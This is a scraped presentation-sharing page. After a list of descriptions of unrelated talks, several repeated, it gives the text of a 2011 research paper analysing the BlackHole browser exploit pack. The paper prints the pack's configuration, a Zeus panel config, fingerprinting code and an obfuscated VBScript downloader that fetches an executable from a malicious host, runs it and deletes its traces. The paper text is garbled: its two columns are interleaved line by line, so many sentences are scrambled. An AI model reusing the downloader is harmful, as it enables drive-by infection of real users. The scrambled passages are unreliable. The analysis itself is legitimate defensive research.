The document summarizes research analyzing the BlackHole browser exploit pack (BEP), one of the most widely used BEPs. The researchers collected samples of the BlackHole BEP over 3 months and analyzed its source code to understand exploitation techniques. Their analysis found the BlackHole BEP uses an AJAX-based framework to track infected machines and supports custom widgets. It also exploits browser vulnerabilities through techniques like heap spraying and uses obfuscation to avoid detection.
IT Security and Wire Fraud Awareness Slide DeckDon Gulling
A presentation on IT security, wire fraud and trends in information technology. The information is focused on making the audience aware of the new threats, how to protect against them, and what measures you can take to keep your critical information secure.
IT Security and Wire Fraud Awareness Slide DeckDon Gulling
A presentation on IT security, wire fraud and trends in information technology. The information is focused on making the audience aware of the new threats, how to protect against them, and what measures you can take to keep your critical information secure.
People who want to take the American Board of Industrial Hygiene (ABIH) Certification in Industrial Hygiene (CIH) exam are always looking for time to study. The following presentation was made at the 2015 American Industrial Hygiene Association Conference and Exhibition in Salt Lake City, UT. It will help you understand the essential elements and practical ways of studying for the CIH exam.
Presentation from one of the remarkable IT Security events in the Baltic States organized by “Data Security Solutions” (www.dss.lv ) Event took place in Riga, on 7th of November, 2013 and was visited by more than 400 participants at event place and more than 300 via online live streaming.
Welcome, this is a project on the study of network Intrusion Detection System, how prevention can be achieved and how Honeypot concept can be used to make network more secured. It explains the research done while developing the application software. The major research done was about understanding how intrusion detection works and how it can be implemented in my application using java as development programming language.
People who want to take the American Board of Industrial Hygiene (ABIH) Certification in Industrial Hygiene (CIH) exam are always looking for time to study. The following presentation was made at the 2015 American Industrial Hygiene Association Conference and Exhibition in Salt Lake City, UT. It will help you understand the essential elements and practical ways of studying for the CIH exam.
Presentation from one of the remarkable IT Security events in the Baltic States organized by “Data Security Solutions” (www.dss.lv ) Event took place in Riga, on 7th of November, 2013 and was visited by more than 400 participants at event place and more than 300 via online live streaming.
Welcome, this is a project on the study of network Intrusion Detection System, how prevention can be achieved and how Honeypot concept can be used to make network more secured. It explains the research done while developing the application software. The major research done was about understanding how intrusion detection works and how it can be implemented in my application using java as development programming language.
Software Security Assurance for DevOps - Hewlett Packard Enterprise + Black DuckBlack Duck by Synopsys
Presented August 11, 2016 by Michael Right, Senior Product Manager, HPE Security Fortify; Mike Pittenger, VP of Security Strategy, Black Duck.
Open source software is an integral part of today’s technology ecosystem, powering everything from enterprise and mobile applications to cloud computing, containers and the Internet of Things.
While open source offers attractive economic and productivity benefits for application development, it also presents organizations with significant security challenges. Every year, thousands of new open source security vulnerabilities – such as Heartbleed, Venom and Shellshock – are reported. Unfortunately, many organizations lack visibility into and control of their open source. Addressing this challenge is vital for ensuring security in applications and containers.
Whether you’re building software for customers or for internal use, the majority of the code is likely open source and securing it is no easy task. In this session, you’ll learn about:
• The evolving DevOps and software security assurance lifecycle in the age of open source
• The software security considerations CISOs, security, and development teams must address when using open source
• An automated approach to identifying vulnerabilities and managing software security assurance for custom and open source code.
PHP is one of the most commonly used languages to develop web sites because of i
ts simplicity, easy to
learn and it can be easily embedded with any of the databases. A web developer with his basic knowledge
developing an application without practising secure guidelines, improper validation of user inputs leads to
various source code
v
ulnerabilities. Logical flaws while designing, implementing and hosting the web
application causes work flow deviation attacks.
In this paper, we are analyzing the complete behaviour of a
web application through static and dynamic analysis methodologies
Software Birthmark Based Theft/Similarity Comparisons of JavaScript ProgramsSwati Patel
A birthmark is a set of characteristic possessed by a program that uniquely recognizes a program. Birthmark of the software is based on Heap Graph. It is generated by using Google Chrome Developer Tools when the program is in execution. Software’s behavioural structure is demonstrated in the heap graph. It describes how the objects are related to each other to deliver the desired functionality of the website. Our aim is to develop and evaluate a system that can find theft/similarity between websites by using Agglomerative Clustering and Improved Frequent Subgraph Mining. To identify if a website is using the original program’s code or its module, birthmark of the original program is explored in the suspected program’s heap graph.
Emerging Trends in Online Social Networks MalwareAditya K Sood
Emerging trends in Social Networks Malware.
Social networks, such as Facebook, Twitter, and others pose a grave
threat to the security and privacy of users. This presentation highlights malware infection strategies
used by attackers to infect social networking websites and addresses security from the user
perspectives—outlining effective, secure steps that can reduce the impact of malware infections
Enfilade: Tool to Detect Infections in MongoDB InstancesAditya K Sood
Attackers are targeting MongoDB instances for conducting nefarious operations on the Internet. The cybercriminals are targeting exposed MongoDB instances and trigger infections at scale to exfiltrate data, destruct data, and extort money via ransom.
Detecting Ransomware/Bot Infections in ElasticsearchAditya K Sood
Elasticsearch infections are rising exponentially. The adversaries are exploiting open and exposed Elasticsearch interfaces to trigger infections in the cloud and non-cloud deployments. During this talk, we will release a tool named "STRAFER" to detect potential infections in the Elasticsearch instances. The tool allows security researchers, penetration testers, and threat intelligence experts to detect compromised and infected Elasticsearch instances running malicious code. The tool also enables you to conduct efficient research in the field of malware targeting cloud databases.
BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan...Aditya K Sood
Bot herders deploy Command and Control (C&C) panels for commanding and collecting exfiltrated data from the infected hosts on the Internet. To protect C&C panels, bot herders deploy several built-in (software-centric) protection mechanisms to restrict direct access to these C&C panels. However, there exist fundamental mistakes in the design and deployment of these C&C panels that can be exploited to take complete control. This talk discusses about the methodology of launching reverse attacks on the centralized C&C panels to derive intelligence that can be used to build automated solutions. This research reveals how to detect vulnerabilities and configuration flaws in the remote C&C panels and exploit them by following the path of penetration testing. This talk is derived from the real time research in which several C&C panels were targeted and intelligence was gathered to attack the next set of C&C panels. A number of case studies will be discussed to elaborate step-by-step process of attacking and compromising C&C panels. This talk also demonstrates the use of automated tools authored for making the testing easier for the researchers.
DOWNLOAD from this link : http://secniche.org/blackhat-2014/
BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Clie...Aditya K Sood
C-SCAD is an information gathering and penetration testing tool written to assess the security issues present in the Web-X (Internet Explorer-based web interface) client used to interact with the ClearSCADA server. WebX client is hosted on the embedded web server which is shipped as a part of complete ClearSCADA architecture. Primarily, the WebX client is restricted to perform any configuration changes but it can reveal potential information about the ClearSCADA server and associated components. Insecure deployments of WebX client can reveal potential information about the various functions such as alarm pages, SQL lists, and diagnostic checks including various reports.
In this article, we discuss the design of an iframe injector used to infect web-hosting software such as cPanel in an automated manner. Several different iframe injector designs exist, but we look at one of the most basic: NiFramer.
CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...Aditya K Sood
Cyber criminals are using advanced attacks to exploit online banking systems and services to covertly steal money. This paper describes the tactics currently used by cyber criminals to conduct cyber bank robbery
ToorCon 14 : Malandroid : The Crux of Android InfectionsAditya K Sood
The Android platform has been plagued by malware for the past several years. Despite all attempts to detect and mitigate malicious applications on Android, malware is still flying under our radar and getting on our devices and causing millions of users financial and data loss every year. Additionally, the malware analysis community is at a large disagreement on how Android malware should be classified. In this talk, we’ll dive into the tactics, tools and procedures used by Android malware today, including several case studies of exceptional malware samples. By analyzing real code used by malware in the wild, we’ll be able to show the advancements in Android malware from a design perspective.
Threats to mobile devices are more prevalent and increasing in scope and complexity. Users of mobile devices desire to take full advantage of the features
available on those devices, but many of the features provide convenience and capability but sacrifice security. This best practices guide outlines steps the users can take to better protect personal devices and information.
Transcript: Selling digital books in 2024: Insights from industry leaders - T...BookNet Canada
The publishing industry has been selling digital audiobooks and ebooks for over a decade and has found its groove. What’s changed? What has stayed the same? Where do we go from here? Join a group of leading sales peers from across the industry for a conversation about the lessons learned since the popularization of digital books, best practices, digital book supply chain management, and more.
Link to video recording: https://bnctechforum.ca/sessions/selling-digital-books-in-2024-insights-from-industry-leaders/
Presented by BookNet Canada on May 28, 2024, with support from the Department of Canadian Heritage.
Essentials of Automations: The Art of Triggers and Actions in FMESafe Software
In this second installment of our Essentials of Automations webinar series, we’ll explore the landscape of triggers and actions, guiding you through the nuances of authoring and adapting workspaces for seamless automations. Gain an understanding of the full spectrum of triggers and actions available in FME, empowering you to enhance your workspaces for efficient automation.
We’ll kick things off by showcasing the most commonly used event-based triggers, introducing you to various automation workflows like manual triggers, schedules, directory watchers, and more. Plus, see how these elements play out in real scenarios.
Whether you’re tweaking your current setup or building from the ground up, this session will arm you with the tools and insights needed to transform your FME usage into a powerhouse of productivity. Join us to discover effective strategies that simplify complex processes, enhancing your productivity and transforming your data management practices with FME. Let’s turn complexity into clarity and make your workspaces work wonders!
Generative AI Deep Dive: Advancing from Proof of Concept to ProductionAggregage
Join Maher Hanafi, VP of Engineering at Betterworks, in this new session where he'll share a practical framework to transform Gen AI prototypes into impactful products! He'll delve into the complexities of data collection and management, model selection and optimization, and ensuring security, scalability, and responsible use.
DevOps and Testing slides at DASA ConnectKari Kakkonen
My and Rik Marselis slides at 30.5.2024 DASA Connect conference. We discuss about what is testing, then what is agile testing and finally what is Testing in DevOps. Finally we had lovely workshop with the participants trying to find out different ways to think about quality and testing in different parts of the DevOps infinity loop.
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...James Anderson
Effective Application Security in Software Delivery lifecycle using Deployment Firewall and DBOM
The modern software delivery process (or the CI/CD process) includes many tools, distributed teams, open-source code, and cloud platforms. Constant focus on speed to release software to market, along with the traditional slow and manual security checks has caused gaps in continuous security as an important piece in the software supply chain. Today organizations feel more susceptible to external and internal cyber threats due to the vast attack surface in their applications supply chain and the lack of end-to-end governance and risk management.
The software team must secure its software delivery process to avoid vulnerability and security breaches. This needs to be achieved with existing tool chains and without extensive rework of the delivery processes. This talk will present strategies and techniques for providing visibility into the true risk of the existing vulnerabilities, preventing the introduction of security issues in the software, resolving vulnerabilities in production environments quickly, and capturing the deployment bill of materials (DBOM).
Speakers:
Bob Boule
Robert Boule is a technology enthusiast with PASSION for technology and making things work along with a knack for helping others understand how things work. He comes with around 20 years of solution engineering experience in application security, software continuous delivery, and SaaS platforms. He is known for his dynamic presentations in CI/CD and application security integrated in software delivery lifecycle.
Gopinath Rebala
Gopinath Rebala is the CTO of OpsMx, where he has overall responsibility for the machine learning and data processing architectures for Secure Software Delivery. Gopi also has a strong connection with our customers, leading design and architecture for strategic implementations. Gopi is a frequent speaker and well-known leader in continuous delivery and integrating security into software delivery.
PHP Frameworks: I want to break free (IPC Berlin 2024)Ralf Eggert
In this presentation, we examine the challenges and limitations of relying too heavily on PHP frameworks in web development. We discuss the history of PHP and its frameworks to understand how this dependence has evolved. The focus will be on providing concrete tips and strategies to reduce reliance on these frameworks, based on real-world examples and practical considerations. The goal is to equip developers with the skills and knowledge to create more flexible and future-proof web applications. We'll explore the importance of maintaining autonomy in a rapidly changing tech landscape and how to make informed decisions in PHP development.
This talk is aimed at encouraging a more independent approach to using PHP frameworks, moving towards a more flexible and future-proof approach to PHP development.
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...James Anderson
Effective Application Security in Software Delivery lifecycle using Deployment Firewall and DBOM
The modern software delivery process (or the CI/CD process) includes many tools, distributed teams, open-source code, and cloud platforms. Constant focus on speed to release software to market, along with the traditional slow and manual security checks has caused gaps in continuous security as an important piece in the software supply chain. Today organizations feel more susceptible to external and internal cyber threats due to the vast attack surface in their applications supply chain and the lack of end-to-end governance and risk management.
The software team must secure its software delivery process to avoid vulnerability and security breaches. This needs to be achieved with existing tool chains and without extensive rework of the delivery processes. This talk will present strategies and techniques for providing visibility into the true risk of the existing vulnerabilities, preventing the introduction of security issues in the software, resolving vulnerabilities in production environments quickly, and capturing the deployment bill of materials (DBOM).
Speakers:
Bob Boule
Robert Boule is a technology enthusiast with PASSION for technology and making things work along with a knack for helping others understand how things work. He comes with around 20 years of solution engineering experience in application security, software continuous delivery, and SaaS platforms. He is known for his dynamic presentations in CI/CD and application security integrated in software delivery lifecycle.
Gopinath Rebala
Gopinath Rebala is the CTO of OpsMx, where he has overall responsibility for the machine learning and data processing architectures for Secure Software Delivery. Gopi also has a strong connection with our customers, leading design and architecture for strategic implementations. Gopi is a frequent speaker and well-known leader in continuous delivery and integrating security into software delivery.
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...SOFTTECHHUB
The choice of an operating system plays a pivotal role in shaping our computing experience. For decades, Microsoft's Windows has dominated the market, offering a familiar and widely adopted platform for personal and professional use. However, as technological advancements continue to push the boundaries of innovation, alternative operating systems have emerged, challenging the status quo and offering users a fresh perspective on computing.
One such alternative that has garnered significant attention and acclaim is Nitrux Linux 3.5.0, a sleek, powerful, and user-friendly Linux distribution that promises to redefine the way we interact with our devices. With its focus on performance, security, and customization, Nitrux Linux presents a compelling case for those seeking to break free from the constraints of proprietary software and embrace the freedom and flexibility of open-source computing.
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024Neo4j
Neha Bajwa, Vice President of Product Marketing, Neo4j
Join us as we explore breakthrough innovations enabled by interconnected data and AI. Discover firsthand how organizations use relationships in data to uncover contextual insights and solve our most pressing challenges – from optimizing supply chains, detecting fraud, and improving customer experiences to accelerating drug discoveries.
UiPath Test Automation using UiPath Test Suite series, part 4DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 4. In this session, we will cover Test Manager overview along with SAP heatmap.
The UiPath Test Manager overview with SAP heatmap webinar offers a concise yet comprehensive exploration of the role of a Test Manager within SAP environments, coupled with the utilization of heatmaps for effective testing strategies.
Participants will gain insights into the responsibilities, challenges, and best practices associated with test management in SAP projects. Additionally, the webinar delves into the significance of heatmaps as a visual aid for identifying testing priorities, areas of risk, and resource allocation within SAP landscapes. Through this session, attendees can expect to enhance their understanding of test management principles while learning practical approaches to optimize testing processes in SAP environments using heatmap visualization techniques
What will you get from this session?
1. Insights into SAP testing best practices
2. Heatmap utilization for testing
3. Optimization of testing processes
4. Demo
Topics covered:
Execution from the test manager
Orchestrator execution result
Defect reporting
SAP heatmap example with demo
Speaker:
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
Epistemic Interaction - tuning interfaces to provide information for AI supportAlan Dix
Paper presented at SYNERGY workshop at AVI 2024, Genoa, Italy. 3rd June 2024
https://alandix.com/academic/papers/synergy2024-epistemic/
As machine learning integrates deeper into human-computer interactions, the concept of epistemic interaction emerges, aiming to refine these interactions to enhance system adaptability. This approach encourages minor, intentional adjustments in user behaviour to enrich the data available for system learning. This paper introduces epistemic interaction within the context of human-system communication, illustrating how deliberate interaction design can improve system understanding and adaptation. Through concrete examples, we demonstrate the potential of epistemic interaction to significantly advance human-computer interaction by leveraging intuitive human communication strategies to inform system design and functionality, offering a novel pathway for enriching user-system engagements.
1. BROWSER EXPLOIT PACKS – EXPLOITATION TACTICS SOOD & ENBODY
BROWSER EXPLOIT PACKS used to spread malware derived from static and dynamic
analysis of the BlackHole BEP.
– EXPLOITATION TACTICS
Aditya K Sood, Richard J. Enbody BROWSER DESIGN AGILITY
Department of Computer Science and Design agility in the browser architectural model refers to the
Engineering, Michigan State University, East robust design of the browser components. Of course, no design
Lansing, MI 48824-1226, USA is perfect, and every design has weaknesses that cannot be
removed completely. Such weaknesses can result in
Email {soodadit, enbody}@cse.msu.edu vulnerabilities. A browser design can be considered weak
based on the following criteria: first, a weakness exists if a
serious design flaw persists in the various components of the
ABSTRACT browser. Design error may lead to vulnerabilities that can
undermine the security as well as the robustness of the
Browser exploit packs have been increasingly used for browser. Second, a weakness exists if there is a possibility of
spreading malware. They use the browser as a medium to subverting the extensible nature of browser components. For
infect users. This paper analyses the BlackHole exploit pack, example, an open system design with customized code that is
and sheds light on the tactics used to distribute malware across allowed to run inline with the software. That would include an
the web. open set of APIs (Application Programming Interfaces) as well
as platform-independent code. It also covers the component
INTRODUCTION codes that can be reprogrammed and reused effectively. Third,
there may be security vulnerabilities in the browser
Malware infection is proliferating. In spite of new advanced
components that are most generic and stealthy.
protection features, it has become difficult to protect against
infections that happen through browsers. The rise of Browser
Exploit Packs (BEPs) [1] plays a significant role in the success METHODOLOGY
of malware infections. BEPs thrive by exploiting the browsers’ In order to analyse the BlackHole BEP, we collected raw
vulnerabilities, and attackers have demonstrated a lot of samples from a variety of sources. We used the Malware
maturity and expertise in developing their exploits. BEPs are Domain List [8] and Clean MX [9] to find a number of
usually used in conjunction with botnets and use domains that were hosting the BlackHole BEP. Figure 1 shows
drive-by-download attacks to load the malware binary onto the a sample list of the BlackHole BEP served by the Malware
victim’s machine. Browser exploit packs such as Fragus, Domain List. It took us close to three months to get the
Fiesta, Yes, Crimepack, Phoenix, Red Dice, MPack, SPack, appropriate samples by analysing the malicious domains that
and Bleeding Life have demonstrated this kind of nefarious serve bots and browser exploit packs together. During this
behaviour. This work is a result of extensive analysis of the process, we detected that live samples of the BlackHole BEP
BlackHole BEP [2, 3], one of the most widely used BEPs were password protected. We applied techniques such as brute
because of its use with the Zeus and SpyEye botnets. In this forcing and social engineering in order to gain full access to
paper, we emphasize the following aspects: the BEP. However, this process was not easy because it was
• Analysis of the BlackHole Browser Exploit Pack. hard to find the domains that were actually serving this
malware. Sometimes, we were not able to find the web pages
• Code auditing of the BlackHole BEP in order to derive
either because the BEP was removed or deleted. We
exploitation and malware spreading techniques.
continuously monitored domains that were hosting the
Our basic premise is that it is crucial to analyse the source BlackHole BEP to track the changes so that the samples
code in order to understand the intrinsic behaviour of the needed could be downloaded for analysis. Most of the
malware when it is running. In this paper, we dissect the analytical tests were conducted with virtual machines in order
source code to derive the exploitation methods used by the to maintain a controlled environment.
BlackHole BEP.
In this experiment, we analysed the exploit pack code and
audited it completely to understand the exploitation techniques
BACKGROUND AND RELATED WORK used by the BlackHole BEP. Figure 1 shows the list of infected
Niel [4] described the basic exploit-based mechanisms in use domains that show the presence of the BlackHole BEP.
in existing malware. Niel generalized web malware
considering the infections that are an outcome of third-party EXPERIMENT AND ANALYTICAL RESULTS
widgets, advertisers, user-contributed content and web server
vulnerabilities. Michael [5] has extended this work to show During analysis, we found that BlackHole BEP files were
how that malware is used to build botnets. In addition, a study scrambled and obfuscated. In general, the BlackHole BEP is
[6] has been conducted to show how the malware exploits the hosted in conjunction with other botnets and uses PHP as a
OS components for malicious purposes and to investigate its base to manage the framework. We present our analytical
repercussions. Further, some of the challenges in detecting results in the following sections.
botnets [7] during crawling mechanisms have been discussed
to analyse the impact of distributed botnets. BlackHole configuration
In our study, we add to that work by explicitly looking into The BlackHole BEP displays a sophisticated design that looks
BEPs to understand their design and the common tactics used like a complete malware framework. For example, BlackHole
to infect the victims. We will present exploitation techniques uses an AJAX-based environment to support different types of
VIRUS BULLETIN CONFERENCE OCTOBER 2011 1
2. BROWSER EXPLOIT PACKS – EXPLOITATION TACTICS SOOD & ENBODY
Figure1: Malware Domain List – domains infected with the BlackHole BEP (registrant details obscured).
widgets. Basically, the design allows every widget to heap spraying techniques. Listing 1 shows the configuration
communicate with the target independently and allows file used by the BlackHole BEP. This file uses some
automatic updates. The widgets’ primary role is to keep track interesting metrics that control the working of the overall
of the information coming back from the infected machines. framework. For example, the ‘reuse_iframe’ parameter is
This information includes the browser types, operating defined for using the same iframe for serving exploits. By
systems and exploits that are vulnerable and have already default, each exploit in the BlackHole BEP is created in its
been exploited. BlackHole also supports custom widgets for own iframe. The ‘exploit_delay’ parameter is configured to
gathering statistical data. A global variable ‘time_interval’ is set an appropriate time delay in serving the exploits
defined to refresh the information according to that interval. consecutively. The ‘config_url’ parameter is defined for
The BlackHole BEP is hosted on an XAMPP Apache specifying the host address where the BlackHole panel is
distribution because it is lightweight and easy to use. hosted. The ‘payload_filename’ parameter uses a default
payload that is required to be included in every new exploit.
BlackHole is made of PHP, HTML and Jar files. PHP files are
The ‘enable_signed’ parameter is applied to control the
usually encrypted with an obfuscator. However, exploits are
signed Java applets which further require user interaction.
basically programmed as inline scripts with PHP pages. As
the PHP pages are accessed by a user, inline exploits are
rendered as HTML and DOM content to drop malicious Exploit obfuscation and encoding
executables by exploiting vulnerabilities in the browser The BlackHole BEP uses two different methods to obfuscate
components or plug-ins. These HTML files primarily consist its PHP code. First, it uses ionCube [10], a standard PHP
of exploitable browser code that generally uses JavaScript encoder, in order to encode all the PHP files as presented in
Listing 2. Table 1 shows the ionCube DLLs for different PHP
versions that are used in encoding the BlackHole BEP
[BlackHole Configuration File] framework. The ‘extension_loaded’ function loads the ionCube
<? $sqlSettings[‘dbHost’] = ‘localhost’; dynamic library based on the information collected by the
$sqlSettings[‘dbUsername’] = ‘root’; ‘php_uname’ and ‘phpversion’ functions. The ‘php_uname’
$sqlSettings[‘dbPassword’] = ‘xxxxx’; function is used to gather information about the operating
system on which PHP is running. The ‘phpversion’ function
$sqlSettings[‘dbName’] = ‘zain2’;
reveals information about running PHP that is installed on the
$sqlSettings[‘tableVisitorsList’] = ‘visitors_list’;
$panel_user = “zain”;
<?php if(!extension_loaded(‘ionCube Loader’)){$_
$panel_pass = “xxxxx”; _oc=strtolower(substr(php_uname(),0,3));$__ln=’/
$enable_signed = false; ioncube/ioncube_loader_’.$__oc.’_’.substr(phpve
rsion(),0,3).(($__oc==’win’)?’.dll’:’.so’);$__
$payload_filename = ‘payload.exe’; oid=$__id=realpath(ini_get(‘extension_dir’));$_
$config_url = ‘http://malicious.com/bl2’; _here=dirname(__FILE__);if(strlen($__id)>1&&$__
id[1]==’:’){$__id=str_replace(‘’,’/’,substr($_
$exploit_delay = 5000; $reuse_iframe = false; _id,2));$__here=str_replace(‘’,’/’,substr($__
$ajax_stats = true; here,2));}$__rd=str_repeat(‘/..’,substr_count($__
id,’/’)).$__here.’/’;
$ajax_delay = 5000; ?> .....?>
Listing 1: BlackHole BEP – configuration file. Listing 2: ionCube encoder in the BlackHole BEP.
2 VIRUS BULLETIN CONFERENCE OCTOBER 2011
3. BROWSER EXPLOIT PACKS – EXPLOITATION TACTICS SOOD & ENBODY
Ioncube
server. ionCube first collects the PHP version information and in the Java Open Business Engine (OBE) and Java workflow
uses specific DLLs in order to encode the BlackHole BEP PHP engine [13]. Since Java is platform independent, this flaw can
files appropriately. With the use of the ionCube encoder, it be exploited easily on any type of browser. In general, a third
becomes really hard to analyse the BlackHole BEP. part vulnerability (such as a Java plug-in) results in a
compromise of all types of browsers running on different
SNo BlackHole BEP files operating systems. As a result of this, the infection rate is
quite high due to ease of exploiting these Java vulnerabilities
1 ioncube_loader_win_4.1.dll as presented in Figure 2.
2 ioncube_loader_win_4.2.dll
3 ioncube_loader_win_4.3.dll SNo Year Exploit – CVEs
4 ioncube_loader_win_4.4.dll 1 2010 CVE-2010-0188, CVE-2010-2884,
CVE-2010-0842, CVE-2010-3552,
5 ioncube_loader_win_5.0.dll
CVE-2010-1297, CVE-2010-0840,
6 ioncube_loader_win_5.1.dll CVE-2010-0806, CVE-2010-1885
Table 1: ionCube DLL version specific to PHP version. 2 2009 CVE-2009-0927, CVE-2009-4324
3 2008 CVE-2008-2992
Second, the BlackHole BEP also uses reverse encoding and
concatenation in generating remote objects in VBScript. A 4 2006 CVE-2006-0003
code snippet present in Listing 3 shows that the BlackHole
Table 2: Exploits served by the BlackHole BEP.
BEP applies extensive reverse calls in order to make the
analysis somewhat harder. The Java-OBE exploit discussed above is completely
In Listing 3, the ‘:a’ parameter holds the value of the remote undetectable by anti-virus engines and executes in a stealthy
address of the domain hosting the BlackHole BEP. The manner. In other ways, BlackHole uses a standard
StrReverse function is used to implement a normal trick in cryptographic function in conjunction with other
calling the code. When the code is rendered in the browser, cryptographic algorithms in order to make code analysis
‘tcejbOmetsySeliF.gnitpircS’ is treated as harder, as well as making it hard to detect by anti-virus
‘Scripting.FileSystemObject’ , ‘PTTHLMX.2LMXSM’ is engines and tools like Wepawet. The BlackHole exploit pack
treated as ‘MSXML2.XMLHTTP’ and ‘maertS.BDODA’ is also uses helper files that result in detection of the software
treated as ADOBA.Stream. We decode the VBScript to get version. The BlackHole BEP uses the ‘plugin_detect.js’ script
this code. However, unwrapping the encoding layers provides to fingerprint the available plug-ins in the victim browser.
better insight into the working of malicious VBScript code. Apart from this, we also find ‘JavaSignedApplet.jar’,
This script pushes the operating system to run wmplayer.exe ‘SiteAudioHelper.jar’ and ‘JavaOBE.jar’ which support the
and realplayer.exe by calling the ‘Script.Shell’ object. execution of Java exploits by collecting requisite information
from the victim browser. These helper files also provide the
Exploit distribution and infections default environment required for triggering vulnerabilities.
By performing continuous analysis and deobfuscation of
sample code, we found that the BlackHole BEP serves a Botnets collaboration
number of exploits for specific CVEs as presented in Table 2. Most BEPs work collectively with botnets to spread infections
After carefully analysing the exploit list, we find that these across the web. During our analysis, we found that the
exploits are the most reliable ones and their ratio of BlackHole BEP works effectively with the Zeus botnet, a
successful execution is high. Further, the most used exploits third-generation banking malware. In this particular sample,
in the BlackHole BEP are CVE-2010-0840 [11] and Zeus works collaboratively with BlackHole, which shows that
CVE-2010-0842 [12]. These vulnerabilities have been found the BEP plays a critical role in determining the success of
w=3000:x=200 :y=1 :z=false :a = “http://malicious.su/f0d/bl2.php?i=3”
:Set e = Createobject(StrReverse(“tcejbOmetsySeliF.gnitpircS”))
:b = e.GetSpecialFolder(2) & “exe.exe”:OT = “GET”
:Set c = CreateObject(StrReverse(“PTTHLMX.2LMXSM”))
:Set d = CreateObject(StrReverse(“maertS.BDODA”))
Set o=Createobject(StrReverse(“tcejbOmetsySeliF.gnitpircS”))
On Error resume next
c.open OT, a, z:c.send()
If c.Status = x Then u=c.ResponseBody:d.Open:d.Type = y:d.Write u:d.SaveToFile b:d.Close End If
CreateObject(StrReverse(“llehS.tpircSW”)).eXeC b
:CreateObject(StrReverse(“llehS.tpircSW”)).eXeC “taskkill /F /IM wmplayer.exe”
:CreateObject(StrReverse(“llehS.tpircSW”)).eXeC “taskkill /F /IM realplay.exe”
:Set g=o.GetFile(e.GetSpecialFolder(2) & “” & StrReverse(“sbv.l”))
:g.Delete:WScript.Sleep w :Set g=o.GetFile(b) :g.Delete
Listing 3: BlackHole BEP – reverse VBScript calls.
VIRUS BULLETIN CONFERENCE OCTOBER 2011 3
4. BROWSER EXPLOIT PACKS – EXPLOITATION TACTICS SOOD & ENBODY
Figure 2: Java exploits – high infection rate.
$DBHOST = “localhost”;
$DBNAME = “Zeus”;
$DBUSER = “root”;
$DBPASS = “pass”;
$ADMINPW = “aaf4c61ddcc5e8a2dabede0f3b482cd9aea9434d”; //SHA-1 Hash from your password
$ACTIVATION_PASSWORD = “suckit”;
$BANTIME = 86400;
$SOUND = “Disabled”;
$COUNTRIES = array(“RU” => “ashrfwdogsfvxn.exe”, “DE” => “ashrfwdogsfvxn.exe”, “US” => “ashrfwdogsfvxn.exe”);
Listing 4: BlackHole BEP configured with Zeus database.
malware infection through botnets. The sampled domain was periodically in all BEPs in order to derive statistics. The
hosting the BlackHole and Zeus panel together. Listing 4 BlackHole BEP uses the same GeoIP library. A brief code
shows that the BlackHole BEP uses the Zeus database to snippet is presented in Listing 5 which shows how the BEP
trigger infections by retrieving specific details about the target. uses modular functions to fetch information related to
countries based on GeoIP location.
The BlackHole BEP also utilizes an anti-malware tracking
system. Since the BlackHole BEP is designed as a full
malware infection framework, it explicitly uses the concept of
blacklisting [14]. This technique is put in practice in order to
prevent malware tracking. The attacker usually feeds the
entries in the form of IP addresses which indicate unusual
behaviour. For example: if a security researcher is tracking a
malicious domain, it is possible that the web server (malware
domain) encounters consecutive requests for file downloads.
Configuring the blacklists with that domain IP address
prevents the BlackHole BEP from serving exploits because
the management system discards the HTTP request and no
positive response is sent back. ‘IP-Url-list.txt’ file is used in
BlackHole to blacklist domains, as shown in Figure 3.
Tracking infected systems
Further, most BEPs will use a GeoIP location library to keep
track of the infections occurring on a per country basis. It has
been shown that the MaxMind [15] free GNU library is used Figure 3: BlackHole BEP – blacklist implementation.
4 VIRUS BULLETIN CONFERENCE OCTOBER 2011
5. BROWSER EXPLOIT PACKS – EXPLOITATION TACTICS SOOD & ENBODY
function geoip_country_name_by_addr($gi, $addr) {
strategies. In the next section, we will
discuss some of the chosen exploit serving
if ($gi->databaseType == GEOIP_CITY_EDITION_REV1) {
techniques used by BEPs.
$record = geoip_record_by_addr($gi,$addr);
return $record->country_name;
} else { BEP TECHNIQUES
$country_id = geoip_country_id_by_addr($gi,$addr); Exploit packs have the potential to steal
if ($country_id !== false) { information from users’ browsers by
return $gi->GEOIP_COUNTRY_NAMES[$country_id]; hooking different component interfaces
} and exploiting vulnerabilities in the
} various components. The following
return false;
techniques have been incorporated in the
browser exploit packs for spreading
}
malware infection and bypassing anti-virus
function getdnsattributes ($l,$ip){
protections.
$r = new Net_DNS_Resolver();
$r->nameservers = array(“ws1.maxmind.com”);
User Agent Fingerprinting (UAF)
$p = $r->search($l.”.” . $ip .”.s.maxmind.com”,”TXT”,”IN”);
$str = is_object($p->answer[0])?$p->answer[0]->string():’’; User agents are defined as the client
ereg(“”(.*)””,$str,$regs); applications that are used to send HTTP
$str = $regs[1]; requests to the server. In general, user
return $str;
agents implement the network protocol
that is required for client-server
}
communication. From a wider perspective,
Listing 5: BlackHole BEP – MaxMind GeoIP stat functions. the user agent parameter (request header)
in the HTTP request carries information
about the browser environment. The user
$user_agent = $_SERVER[‘HTTP_USER_AGENT’]
agent parameter provides information
function getbrowserver(& $MSIEversion, & $OPERAversion) {
regarding the type of browser, the
$uag = $_SERVER[‘HTTP_USER_AGENT’];
operating system and the security model.
if ( strstr( $uag, “Firefox” ) ) { As stated in RFC 2616 [16], user agent
if ( preg_match( “#Firefox/(d+.?d*.?d*)#s”, $uag, $mt ) ) { strings are meant for statistical purposes.
return “Firefox v{$mt[1]}”; } Concurrent with the rise of infections
return “Firefox”; } based on BEPs, user agent fingerprinting is
........................ also proliferating. BEP writers are
function getbrowsertype( ) { exploiting the functionality of the user
$uag = $_SERVER[‘HTTP_USER_AGENT’]; agent because it transmits information
if ( strstr( $uag, “Opera” ) ) { return “Opera”; }
from the victim machine to the destination.
For example: the user agent transmits
if ( strstr( $uag, “Firefox” ) ) {return “Firefox”; }
information as {User-Agent: Mozilla/4.0
if ( strstr( $uag, “MSIE” ) ) { return “MSIE”; }
